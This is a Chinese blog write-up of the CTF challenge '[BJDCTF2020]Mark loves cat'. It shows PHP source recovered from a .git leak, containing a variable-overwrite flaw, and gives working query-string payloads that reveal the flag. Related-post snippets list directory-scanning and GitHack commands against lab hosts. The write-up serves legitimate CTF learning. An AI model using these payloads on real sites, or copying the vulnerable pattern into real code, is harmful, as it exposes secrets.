BJDCTF2020]Mark loves cat

最新推荐文章于 2024-07-17 01:52:52 发布
最新推荐文章于 2024-07-17 01:52:52 发布
阅读量198 收藏
点赞数
分类专栏: buu # web之每日一题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Shannidawang/article/details/119536059
版权
博客提及.git泄露情况,通过该泄露得到flag.php和index.php两个重要文件,还给出了payload相关内容,包含第二个if和第三个if,以及参考连接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

.git泄露
在这里插入图片描述
得到两个重要文件
flag.php

<?php
$flag = file_get_contents('/flag');

index.php

<?php

include 'flag.php';//包含了flag.php

$yds = "dog";
$is = "cat";
$handsome = 'yds';

#变量覆盖漏洞
foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}
echo "the flag is: ".$flag;

payload:
第二个if

1:$x=yds;$y=flag
2$$x=$yds;$$y=$flag
3$$x=$$y即$yds=$flag

?yds=flag

第三个if

#传入flag=flag
1:$x=flag;$y=flag
2:$$x=$flag;$$y=$flag
3:$$x=$$y即$flag=$flag#所以flag的值是不变的

?is=flag&flag=flag

参考连接

[BJDCTF2020]Mark loves cat 1
weixin_45577185的博客
09-06 625
用dirb扫一下,发现源码泄露 dirb http://7036e761-e13f-483a-a1ed-6b0aa08562ed.node4.buuoj.cn:81/ 脚本获得源码 python GitHack.py http://7036e761-e13f-483a-a1ed-6b0aa08562ed.node4.buuoj.cn:81/ <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach(
[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞)
qq_43622442的博客
05-04 8687
[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞) 这几天被学生机折磨死了,第一次用好多不熟练,刷个题压压惊。 1.拿到网站,发现所有的超链接都是指向自己的:(两种答案都在最后) 2.扫描目录找到 .git 泄露: (做ctf题要习惯用dirsearch,而且要调低线程): dirsearch.py -u url -e * --timeout=2 -t 1 ...
[BJDCTF2020]Mark loves cat
qq_54929891的博客
03-08 251
打开链接后无论点哪里都是Mark Stev的介绍,扫描后发现是git泄露,但是我的GitHack出了点问题,因此只能看提示给的文档了 一开始我想的很简单,只要绕过两个if不就可以了 第一个if作用:如果不用get方法和post传给变量flag,则输出$yds并退出 第二个if作用:如果用GET或POST方法给flag变量传一个flag值,则输出$is并退出,则不小儿科么,直接flag=1用post和get方法都传一边,没有管foreach ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
BUUCTF [BJDCTF2020]Mark loves cat
qtL0ng的博客
06-29 3344
打开题目 搜索一番没有任何发现; dirsearch扫描后发现.git泄露,GitHack.py下载源码: python GitHack.py http://b77333f7-af9a-4f4a-aad0-b328ef9c8369.node3.buuoj.cn/.git 得到两个php文件,接下来就是代码审计: flag.php: <?php $flag = file_get_contents('/flag'); index.php: <?php include 'flag.php';
buu做题笔记——[BJDCTF2020]Mark loves cat&[MRCTF2020]Ez_bypass&[GKCTF2020]CheckIN
weixin_46330722的博客
11-05 688
BUU[BJDCTF2020]Mark loves cat[MRCTF2020]Ez_bypass [BJDCTF2020]Mark loves cat 进入题目是一个博客首页 点了半天没找到可以利用的点,用dirsearch扫一下 扫到.git目录,用Githack把源码down下来 看一下关键代码 //flag.php <?php $flag = file_get_contents('/flag'); //index.php <?php include 'flag.php';
BUUCTF-[BJDCTF2020]Mark loves cat
weixin_57938502的博客
11-20 490
用ctf-wscan扫一下 看着有点像git泄露,输入.git查看一下,发现是403拒绝访问,说明存在git泄露只不过我们没法访问 可以用lijiejie的GitHack下载一下 下载下来打开有两个文件。 flag.php内容是读取flag文件赋值给$flag变量 index.php打开在最下面有一段PHP代码 遍历传入的get参数,要求传入的参数的键为flag并且等于$x又要求$x不等于flag,满足要求就会退出脚本。(这个两个要求相互矛盾根本不可能完成)...
web buuctf [BJDCTF2020]Mark loves cat1
weixin_44214568的博客
03-30 1080
考点: 1.git泄露 2.变量覆盖 1.打开靶机,先看robots.txt,并用dirsearch进行扫描 py dirsearch.py -u f190ddaf-3db0-48c2-a858-4accf0783a69.node4.buuoj.cn:81/ -e * -t 1 -x 429 (使用dirsearch时,一定要设置好线程,不然扫不出来) 扫描发现错在.git泄露 2.利用githack把git文件抓下来 python2 GitHack.py http://f190
审计练习9——[BJDCTF2020]Mark loves cat
qq_43756333的博客
06-01 470
平台:buuoj.cn 打开靶机 先扫目录,发现git泄露 githack下下来 看下这两个php文件 flag.php读取flag,index.php前端代码后php关键代码如下 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y;//把post传入的变量x前添加$ } foreach($_GET as
[BJDCTF2020]Mark loves cat(解决githack无法下载源码&&githack无法获取文件)
qq_64201116的博客
06-05 1561
点击这里下载选择安装路径后在该文件夹下路径输入cmd,在命令行中输入python Githack.py 127.0.0.1/.git(你的网址后面有/.git就行) 这里有一题比较简单的变量覆盖题目,可以思考一下我们并不知道$test是什么,但是有个extract($_GET)可以把我们输入的get传参全部变成变量那我们就可以在url输入?test=1&gift=1 即可满足输出flag条件还有一种就是$$x的模式 有了这些思路就来进入页面发现没有什么功能点,那就先扫一下有没有文件泄露在githack
CTF-Web习题:[BJDCTF2020]Mark Loves cat
最新发布
LJW123487的博客
07-17 562
本题知识点:目录扫描、.git源码泄露、PHP变量覆盖漏洞
变量覆盖漏洞分析:从BUUCTF-Web-Mark loves cat挑战看PHP安全
文章还通过一个名为`BJDCTF2020`的CTF挑战展示了如何利用变量覆盖。在这个例子中,挑战者需要通过分析泄露的`.git`目录获取信息,然后运行特定的Python脚本来解析数据。最终,他们发现了一个含有可变变量的PHP代码段...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值